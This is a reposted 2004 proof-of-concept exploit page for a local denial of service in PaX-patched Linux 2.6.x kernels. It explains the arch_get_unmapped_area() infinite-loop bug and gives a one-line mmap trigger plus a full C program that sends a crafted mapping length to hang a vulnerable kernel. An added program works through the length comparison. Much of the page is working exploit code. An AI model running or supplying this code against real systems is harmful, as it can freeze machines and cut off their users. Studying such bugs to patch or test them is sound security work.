PaX DoS proof-of-concept
Source: www.sabu.net  Author: Shadowinteger  Published: 2004-05-13

/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
by Shadowinteger <shadowinteger sentinix org>
2004-05-04

Written after reading the security advisory posted by borg (ChrisR-) on
Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net

Acknowledgments: sabu (www.sabu.net);


Vulnerability:
PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
(function in mm/mmap.c) is vulnerable to a local Denial of Service attack
because of a bug that puts the kernel into an infinite loop.

Read the security advisory for more info:
http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0


Exploitation:
We need to get past the following line of code in
arch_get_unmapped_area() to succeed with a DoS:
if (TASK_SIZE - len < addr) { ...

We do it like this:

TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL

DOSVAL is the value we'll use.

arch_get_unmapped_area() does the following:

if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
(TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.

A DOSVAL of e.g. 0x80000000 or above will work most times, no real need
for the funky calculation above.

There are quite a few functions available that are "front-ends" to
arch_get_unmapped_area(). This exploit uses good-old mmap().


Tiny DoS PoC:

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);}

*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

/* 32-bit x86 user address space limit and the values from the write-up above. */
#define TASK_SIZE 0xc0000000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x04000000

/* Length handed to mmap(); chosen so that TASK_SIZE - DOSVAL < TYPICAL_ADDR. */
#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)

int main(void) {
    int fd = open("/dev/zero", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
           "by Shadowinteger <shadowinteger sentinix org> 20040504\n"
           "created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
           "ChrisR -> www.cr-secure.net\n"
           "\n"
           "the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
           "\n"
           "greetz goes to: sabu (www.sabu.net);\n"
           "\n"
           "------------------------------------------------------------------------------\n"
           "will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
           "\n"
           "if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n"
           "are you sure you want to continue? [type Y to continue] ", DOSVAL);
    fflush(stdout);

    if (getchar() != 'Y') {
        printf("aborted.\n");
        close(fd);
        return 0;
    }

    printf("\n"
           "attempting to DoS...\n");

    /* On a vulnerable PaX kernel this call never returns (kernel infinite loop). */
    if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
        perror("mmap");
    }

    /* Reaching this point means the request was handled normally. */
    printf("your kernel does not seem to be vulnerable! :)\n");

    close(fd);
    return 0;
}
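The `TASK_SIZE - len < addr` comparison from the Exploitation notes in the header comment, worked through in 32-bit unsigned arithmetic with the page's own constants. This is an added example written for this page, not part of Shadowinteger's PoC: it only models the comparison quoted from the advisory, so it shows why the SINK term is needed (without it the comparison is exactly at the boundary) and why lengths of 0x80000000 and above satisfy it for a typical randomized base. The page-alignment step and the early rejection of lengths above TASK_SIZE are assumptions about the generic 2.6 mmap path, not something the page states; the function and macro names are my own.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constants as used in the PoC above (32-bit x86 user address space). */
#define TASK_SIZE    0xc0000000u
#define TYPICAL_ADDR 0x43882000u
#define SINK         0x04000000u
#define PAGE_4K      0x1000u

/* Round a request length up to a 4 KiB page boundary. */
static uint32_t page_align(uint32_t len)
{
    return (len + PAGE_4K - 1) & ~(PAGE_4K - 1);
}

/* The page's formula for DOSVAL, evaluated in 32-bit unsigned arithmetic. */
static uint32_t dosval(void)
{
    return TASK_SIZE - TYPICAL_ADDR + SINK;
}

/*
 * Model of the comparison quoted from the advisory: a request of `len`
 * bytes whose search starts at `addr` takes the branch guarded by
 *     if (TASK_SIZE - len < addr)
 * when that comparison is true.  Lengths above TASK_SIZE (or that round
 * to zero) are assumed to be rejected earlier by the generic mmap path,
 * so they never reach the comparison.
 */
static bool reaches_guarded_branch(uint32_t len, uint32_t addr)
{
    len = page_align(len);
    if (len == 0 || len > TASK_SIZE)
        return false;              /* rejected before the search loop */
    return (TASK_SIZE - len) < addr;
}

int main(void)
{
    /* Constructed sample requests: the page's DOSVAL, its two "round" values,
     * the boundary case without SINK, a normal 1 MiB mapping and an oversized one. */
    const uint32_t lens[] = { dosval(), 0xa0000000u, 0x80000000u,
                              TASK_SIZE - TYPICAL_ADDR, 0x00100000u, 0xd0000000u };
    size_t i;

    printf("search base addr = 0x%08" PRIx32 "\n", TYPICAL_ADDR);
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        uint32_t len = page_align(lens[i]);
        if (len > TASK_SIZE) {
            printf("len 0x%08" PRIx32 "  rejected (len > TASK_SIZE)\n", len);
            continue;
        }
        printf("len 0x%08" PRIx32 "  TASK_SIZE-len = 0x%08" PRIx32 "  reaches branch: %s\n",
               len, TASK_SIZE - len,
               reaches_guarded_branch(lens[i], TYPICAL_ADDR) ? "yes" : "no");
    }
    return 0;
}
```

The boundary row (`TASK_SIZE - TYPICAL_ADDR`, i.e. DOSVAL without SINK) gives `TASK_SIZE - len == TYPICAL_ADDR`, which is not strictly less, so the comparison fails; that is the whole reason the SINK term appears in the formula.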
